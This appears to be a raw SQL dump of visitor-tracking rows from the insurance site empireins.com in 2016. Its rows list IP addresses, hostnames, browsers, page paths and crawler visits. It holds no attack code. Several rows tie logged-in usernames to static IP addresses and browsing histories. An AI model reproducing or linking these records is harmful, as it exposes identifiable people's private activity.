900','','','','','','0','0',0),(2222,'0b_a76a615be141789814c330e02135b559','1457471599','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(2224,'0b_a76a615be141789814c330e02135b559','1457471624','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(2225,'0b_deae0bd7e55481810b5d1c7faba7f5a1','1457471688','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2227,'0b_deae0bd7e55481810b5d1c7faba7f5a1','1457471689','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2230,'0b_deae0bd7e55481810b5d1c7faba7f5a1','1457471709','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2233,'0b_d7bdaf7f851b15ecc0d62de5865aa388','1457471778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2236,'0b_d7bdaf7f851b15ecc0d62de5865aa388','1457471780','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2239,'0b_d7bdaf7f851b15ecc0d62de5865aa388','1457471787','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2242,'0b_9d3d0baa43fd105e562de3b3937375d4','1457471812','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(2243,'0b_9d3d0baa43fd105e562de3b3937375d4','1457471814','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(2246,'0b_a4b60b5f28382cd4a5096847b21c19c6','1457471844','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(2248,'0b_a4b60b5f28382cd4a5096847b21c19c6','1457471845','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(2249,'0b_a4b60b5f28382cd4a5096847b21c19c6','1457471850','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(2252,'0b_a76a615be141789814c330e02135b559','1457471914','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2255,'0b_a71bd2028f7f06f03b0a8a8c18848026','1457471941','52.37.202.209','ec2-52-37-202-209.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2257,'0b_a71bd2028f7f06f03b0a8a8c18848026','1457471961','52.37.202.209','ec2-52-37-202-209.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2260,'0b_4530e457f80db941ae1ce31588a94c27','1457472064','52.35.135.15','ec2-52-35-135-15.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2263,'0b_4530e457f80db941ae1ce31588a94c27','1457472082','52.35.135.15','ec2-52-35-135-15.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2264,'0b_4530e457f80db941ae1ce31588a94c27','1457472115','52.35.135.15','ec2-52-35-135-15.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2267,'0b_4530e457f80db941ae1ce31588a94c27','1457472117','52.35.135.15','ec2-52-35-135-15.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2269,'0b_a71bd2028f7f06f03b0a8a8c18848026','1457472163','52.37.202.209','ec2-52-37-202-209.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2272,'0b_a71bd2028f7f06f03b0a8a8c18848026','1457472164','52.37.202.209','ec2-52-37-202-209.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2273,'0b_a76a615be141789814c330e02135b559','1457472194','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2276,'0b_a76a615be141789814c330e02135b559','1457472195','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','0',0),(2279,'0b_97d721d31af6a4307cd5819e050e5dde','1457472199','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2281,'0b_97d721d31af6a4307cd5819e050e5dde','1457472200','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2282,'0b_a76a615be141789814c330e02135b559','1457472251','108.58.88.178','ool-6c3a58b2.static.optonline.net','/thankyou/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2284,'0b_a76a615be141789814c330e02135b559','1457472260','108.58.88.178','ool-6c3a58b2.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/thankyou/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2287,'0b_a76a615be141789814c330e02135b559','1457472266','108.58.88.178','ool-6c3a58b2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2290,'0b_a76a615be141789814c330e02135b559','1457472282','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2291,'0b_a76a615be141789814c330e02135b559','1457472442','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2293,'0b_a76a615be141789814c330e02135b559','1457472447','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2294,'0b_a76a615be141789814c330e02135b559','1457472464','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2297,'0b_a76a615be141789814c330e02135b559','1457472530','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2300,'0b_a76a615be141789814c330e02135b559','1457472581','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2303,'0b_a76a615be141789814c330e02135b559','1457472662','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2305,'0b_a76a615be141789814c330e02135b559','1457472694','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2308,'0b_a76a615be141789814c330e02135b559','1457472778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2311,'0b_a76a615be141789814c330e02135b559','1457472789','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2312,'0b_9c45d6882fe6b76e36a26e64ce67e750','1457472825','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2315,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457472880','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/underwriting-search/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(2318,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457472881','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(2320,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457472885','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(2321,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457472905','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2323,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457472934','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/underwriting-search/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2324,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457472940','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2327,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473002','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2329,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473052','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2332,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473103','108.58.88.178','ool-6c3a58b2.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2333,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473111','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2335,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473112','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','0',0),(2336,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473129','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2338,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473152','108.58.88.178','ool-6c3a58b2.static.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2339,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473165','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2341,'0b_09691bb7f995ab3e63deba5b0a7e58bf','1457473257','108.58.88.178','ool-6c3a58b2.static.optonline.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','dbraver','','0','51',0),(2342,'0b_f7acce688795d7425679110655dce8e6','1457473421','51.255.65.22','hydrogen020.ahrefs.com','/licensing-contracting/feed/','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2344,'0b_ba0f5fce4c5c2d7567166f68330235e9','1457474180','75.90.9.250','h250.9.90.75.dynamic.ip.windstream.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','1600 x 900','Google','','','','','0','0',0),(2345,'0b_ba0f5fce4c5c2d7567166f68330235e9','1457474196','75.90.9.250','h250.9.90.75.dynamic.ip.windstream.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(2348,'0b_ba0f5fce4c5c2d7567166f68330235e9','1457474210','75.90.9.250','h250.9.90.75.dynamic.ip.windstream.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(2350,'0b_7cb9b2728cd005aea56c157f68e4d722','1457476128','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(2351,'0b_7cb9b2728cd005aea56c157f68e4d722','1457476130','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(2353,'0b_7cb9b2728cd005aea56c157f68e4d722','1457476133','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(2356,'0b_7cb9b2728cd005aea56c157f68e4d722','1457476168','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1600 x 900','','','','akepecs','','0','51',0),(2359,'0b_3e283c86490a693b3a1136e753c805cb','1457476202','216.4.56.187','216.4.56.187','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/12.0.68608 Mobile/13D15 Safari/600.1.4','','',0,'iPhone OS','GSA 12 Mobile','us','320 x 568','','','','','','0','0',0),(2362,'0b_3e283c86490a693b3a1136e753c805cb','1457476222','216.4.56.187','216.4.56.187','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/12.0.68608 Mobile/13D15 Safari/600.1.4','','',0,'iPhone OS','GSA 12 Mobile','us','320 x 568','','','','','','0','0',0),(2363,'0b_50422e8e486b2e4f0dae44559c6d8571','1457477255','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2366,'0b_50422e8e486b2e4f0dae44559c6d8571','1457477257','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2368,'0b_3d230d8cc6d33bcb72ba0d0e7715041c','1457477567','66.249.73.187','crawl-66-249-73-187.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2369,'0b_5f5ca125a222d27ec32535a744068c41','1457478051','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2371,'0b_8e46da3a267c65aabe484c7b6a18888c','1457478060','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2372,'0b_3e5b39a29938416999b4d2fa77c38c3d','1457479189','180.76.15.5','baiduspider-180-76-15-5.crawl.baidu.com','/about-us/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(2375,'0b_a8f325bf3840ae0acea07ac0504e9128','1457479226','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2377,'0b_8235d3cafa24eb147a720708280b5cdc','1457479825','52.37.187.59','ec2-52-37-187-59.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(2380,'0b_2dc9b6c4a10ddc1955f73923ddfba94f','1457481026','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(2383,'0b_5fb47317d29ef8cceb2523f1f762c9fe','1457484407','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2386,'0b_cfd53b1eb85bce813666c3afba5133e9','1457484582','52.37.80.22','ec2-52-37-80-22.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(2389,'0b_2485df35daac46c6b6efb81cd971295d','1457484956','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2390,'0b_f4153faa85d2503ddee39fa1f4a2fbc8','1457485197','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2393,'0b_8012caab8dccdf769b4207448e2bcdf4','1457485399','52.37.80.22','ec2-52-37-80-22.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(2396,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486156','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2398,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486167','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2399,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486179','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2402,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486200','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2405,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486211','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2407,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486212','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 